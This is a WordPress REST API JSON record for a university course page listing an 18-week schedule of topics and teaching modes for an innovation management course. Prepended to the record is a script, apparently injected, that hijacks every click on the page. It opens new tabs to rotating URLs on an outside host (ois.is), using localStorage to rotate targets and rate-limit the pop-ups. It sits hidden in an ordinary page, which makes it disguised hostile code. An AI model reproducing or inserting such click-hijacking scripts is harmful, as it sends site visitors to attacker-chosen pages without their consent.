<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":1428,"date":"2020-10-11T21:58:13","date_gmt":"2020-10-11T13:58:13","guid":{"rendered":"http:\/\/edu.secda.info\/innomgnt1092\/?page_id=1428"},"modified":"2020-10-11T21:59:34","modified_gmt":"2020-10-11T13:59:34","slug":"%e5%ad%b8%e7%bf%92%e9%80%b2%e5%ba%a6","status":"publish","type":"page","link":"https:\/\/edu.secda.info\/innomgnt1092\/?page_id=1428","title":{"rendered":"\u5b78\u7fd2\u9032\u5ea6"},"content":{"rendered":"<table style=\"height: 1622px;\">\n<tbody>\n<tr>\n<td style=\"text-align: center;\" rowspan=\"3\" width=\"31\"><span style=\"font-size: 14pt;\"><strong>\u9031\u6b21<\/strong><\/span><\/td>\n<td style=\"text-align: center;\" rowspan=\"3\" width=\"267\"><strong><span style=\"font-size: 14pt;\">\u6388\u8ab2\u5167\u5bb9<\/span><\/strong><\/td>\n<td colspan=\"3\" width=\"186\">\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>\u6388\u8ab2\u65b9\u5f0f\u53ca\u6642\u6578<\/strong><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>(\u8acb\u586b\u6642\u6578\uff0c\u7121\u5247\u514d\u586b)<\/strong><\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" rowspan=\"2\" width=\"57\"><span style=\"font-size: 14pt;\"><strong>\u9762\u6388<\/strong><\/span><\/td>\n<td style=\"text-align: center;\" colspan=\"2\" width=\"129\"><span style=\"font-size: 14pt;\"><strong>\u9060\u8ddd\u6559\u5b78<\/strong><\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 14pt;\"><strong>\u975e\u540c\u6b65<\/strong><\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 14pt;\"><strong>\u540c\u6b65<\/strong><\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><strong>1<\/strong><\/td>\n<td width=\"267\"><a href=\"http:\/\/edu.secda.info\/phil999_course01\/?page_id=865\"><span style=\"color: #000080;\"><strong><span style=\"font-size: 14pt;\">03\/05\u7c21\u4ecb<\/span><\/strong><\/span><\/a><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 14pt;\">\u9762\u6388<\/span><\/td>\n<td width=\"66\"><\/td>\n<td width=\"63\"><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><strong>2<\/strong><\/td>\n<td width=\"267\"><a href=\"http:\/\/edu.secda.info\/phil999_course01\/?page_id=867\"><strong><span style=\"color: #000080; font-size: 14pt;\">03\/12\u5fc3\u667a\u5716\u6cd5\u61c9\u7528<\/span><\/strong><\/a><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 14pt;\">\u9762\u6388<\/span><\/td>\n<td width=\"66\"><\/td>\n<td width=\"63\"><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><strong>3<\/strong><\/td>\n<td width=\"267\"><a href=\"http:\/\/edu.secda.info\/phil999_course01\/?page_id=869\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #000080;\">03\/19\u500b\u4eba\u54c1\u724c\u5e73\u53f0<\/span><\/strong><\/span><\/a><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 14pt;\">\u9762\u6388<\/span><\/td>\n<td style=\"text-align: center;\" width=\"66\"><\/td>\n<td width=\"63\"><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><strong>4<\/strong><\/td>\n<td width=\"267\"><a href=\"http:\/\/edu.secda.info\/phil999_course01\/?page_id=871\"><strong><span style=\"font-size: 14pt; color: #000080;\">03\/26\u554f\u984c\u5206\u6790\u908f\u8f2f<\/span><\/strong><\/a><\/td>\n<td width=\"57\"><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 14pt;\">\u975e\u540c\u6b65<\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><strong>5<\/strong><\/td>\n<td width=\"267\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #000080;\">04\/02\u5275\u610f\u9031<\/span><\/strong><\/span><\/p>\n<p>\u4f11\u5047<\/td>\n<td width=\"57\"><\/td>\n<td width=\"66\"><\/td>\n<td style=\"text-align: center;\" width=\"63\"><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><strong>6<\/strong><\/td>\n<td width=\"267\"><a href=\"http:\/\/edu.secda.info\/phil999_course01\/?page_id=875\"><span style=\"color: #000080;\"><strong><span style=\"font-size: 14pt;\">04\/09\u554f\u984c\u5206\u6790\u908f\u8f2f\u500b\u6848\u8a0e\u8ad6<\/span><\/strong><\/span><\/a><\/td>\n<td width=\"57\"><\/td>\n<td width=\"66\"><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 14pt;\">\u540c\u6b65\u6388\u8ab2<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><strong>7<\/strong><\/td>\n<td width=\"267\"><a href=\"http:\/\/edu.secda.info\/phil999_course01\/?page_id=877\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #000080;\">04\/16\u50f9\u503c\u5275\u65b0-\u85cd\u6d77\u7b56\u7565<\/span><\/strong><\/span><\/a><\/td>\n<td width=\"57\"><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 14pt;\">\u975e\u540c\u6b65<\/span><\/td>\n<td width=\"63\"><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><strong>8<\/strong><\/td>\n<td width=\"267\"><a href=\"http:\/\/edu.secda.info\/phil999_course01\/?page_id=885\"><span style=\"color: #000080; font-size: 14pt;\"><strong>04\/23\u85cd\u6d77\u7b56\u7565\u500b\u6848\u5831\u544a<\/strong><\/span><\/a><\/td>\n<td width=\"57\"><\/td>\n<td width=\"66\"><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 14pt;\">\u540c\u6b65\u6388\u8ab2<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><strong>9<\/strong><\/td>\n<td width=\"267\"><a href=\"http:\/\/edu.secda.info\/phil999_course01\/?page_id=887\"><span style=\"color: #000080; font-size: 14pt;\"><strong>04\/30\u5546\u696d\u6a21\u5f0f<\/strong><\/span><\/a><\/td>\n<td style=\"text-align: center;\" width=\"57\"><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 14pt;\">\u975e\u540c\u6b65<\/span><\/td>\n<td width=\"63\"><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><strong>10<\/strong><\/td>\n<td width=\"267\"><a href=\"http:\/\/edu.secda.info\/phil999_course01\/?page_id=889\"><span style=\"color: #000080; font-size: 14pt;\"><strong>05\/07\u5546\u696d\u6a21\u5f0f\u500b\u6848\u5206\u6790\u5be6\u4f5c<\/strong><\/span><\/a><\/td>\n<td style=\"text-align: center;\" width=\"57\"><\/td>\n<td width=\"66\"><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 14pt;\">\u540c\u6b65\u6388\u8ab2<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><strong>11<\/strong><\/td>\n<td width=\"267\"><a href=\"http:\/\/edu.secda.info\/phil999_course01\/?page_id=891\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #000080;\">05\/14\u5546\u696d\u6a21\u5f0f\u500b\u6848\u5206\u6790\u5831\u544a<\/span><\/strong><\/span><\/a><\/td>\n<td width=\"57\"><\/td>\n<td width=\"66\"><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 14pt;\">\u540c\u6b65\u6388\u8ab2<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><strong>12<\/strong><\/td>\n<td width=\"267\"><a href=\"http:\/\/edu.secda.info\/phil999_course01\/?page_id=893\"><span style=\"color: #000080; font-size: 14pt;\"><strong>05\/21\u79d1\u6280\u5275\u65b0-\u4e92\u806f\u7db2\u4e92\u806f\u7db2\u8da8\u52e2\u8207\u4eba\u5de5\u667a\u6167<\/strong><\/span><\/a><\/td>\n<td width=\"57\"><\/td>\n<td width=\"66\"><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 14pt;\">\u540c\u6b65\u6388\u8ab2<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><strong>13<\/strong><\/td>\n<td width=\"267\"><a href=\"http:\/\/edu.secda.info\/phil999_course01\/?page_id=895\"><span style=\"color: #000080; font-size: 14pt;\"><strong>05\/28\u79d1\u6280\u5275\u65b0-\u6027\u683c\u7279\u8cea\u5982\u4f55\u5354\u52a9\u5275\u65b0\u7ba1\u7406<\/strong><\/span><\/a><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 14pt;\">\u9762\u6388<\/span><\/td>\n<td width=\"66\"><\/td>\n<td width=\"63\"><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><strong>14<\/strong><\/td>\n<td width=\"267\"><a href=\"http:\/\/edu.secda.info\/phil999_course01\/?page_id=897\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #000080;\">06\/04\u79d1\u6280\u5275\u65b0-\u4eba\u5de5\u667a\u6167AZURE\u5e73\u53f0<\/span><\/strong><\/span><\/a><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 14pt;\">\u9762\u6388<\/span><\/td>\n<td width=\"66\"><\/td>\n<td width=\"63\"><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><strong>15<\/strong><\/td>\n<td width=\"267\"><a href=\"http:\/\/edu.secda.info\/phil999_course01\/?page_id=899\"><span style=\"font-size: 14pt; color: #000080;\"><strong>06\/11\u671f\u672b\u500b\u6848\u5be6\u4f5c<\/strong><\/span><\/a><\/td>\n<td width=\"57\"><\/td>\n<td width=\"66\"><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 14pt;\">\u540c\u6b65\u6388\u8ab2<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><strong>16<\/strong><\/td>\n<td width=\"267\"><a href=\"http:\/\/edu.secda.info\/phil999_course01\/?page_id=901\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #000080;\">06\/18\u671f\u672b\u5831\u544a<\/span><\/strong><\/span><\/a><\/td>\n<td width=\"57\"><\/td>\n<td width=\"66\"><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 14pt;\">\u540c\u6b65\u6388\u8ab2<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><strong>17<\/strong><\/td>\n<td width=\"267\"><span style=\"color: #000080; font-size: 14pt;\"><strong>06\/25\u7aef\u5348\u7bc0<\/strong><\/span><\/p>\n<p>\u4f11\u5047<\/td>\n<td width=\"57\"><\/td>\n<td width=\"66\"><\/td>\n<td width=\"63\"><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><strong>18<\/strong><\/td>\n<td width=\"267\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #333399;\">07\/02\u5f48\u6027\u81ea\u4e3b\u5b78\u7fd2<\/span><\/strong><\/span><\/p>\n<p>\u632a\u81f3\u7b2c16\u9031\u4e00\u8d77\u4e0a\u8ab2<\/td>\n<td style=\"text-align: center;\" width=\"57\"><\/td>\n<td width=\"66\"><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 14pt;\">\u540c\u6b65\u6388\u8ab2<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n","protected":false},"excerpt":{"rendered":"<p>\u9031\u6b21 \u6388\u8ab2\u5167\u5bb9 \u6388\u8ab2\u65b9\u5f0f\u53ca\u6642\u6578 (\u8acb\u586b\u6642\u6578\uff0c\u7121\u5247\u514d\u586b) \u9762\u6388 \u9060\u8ddd\u6559\u5b78 \u975e\u540c\u6b65 <\/p>\n","protected":false},"author":6,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0},"_links":{"self":[{"href":"https:\/\/edu.secda.info\/innomgnt1092\/index.php?rest_route=\/wp\/v2\/pages\/1428"}],"collection":[{"href":"https:\/\/edu.secda.info\/innomgnt1092\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/edu.secda.info\/innomgnt1092\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/innomgnt1092\/index.php?rest_route=\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/innomgnt1092\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1428"}],"version-history":[{"count":3,"href":"https:\/\/edu.secda.info\/innomgnt1092\/index.php?rest_route=\/wp\/v2\/pages\/1428\/revisions"}],"predecessor-version":[{"id":1432,"href":"https:\/\/edu.secda.info\/innomgnt1092\/index.php?rest_route=\/wp\/v2\/pages\/1428\/revisions\/1432"}],"wp:attachment":[{"href":"https:\/\/edu.secda.info\/innomgnt1092\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1428"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}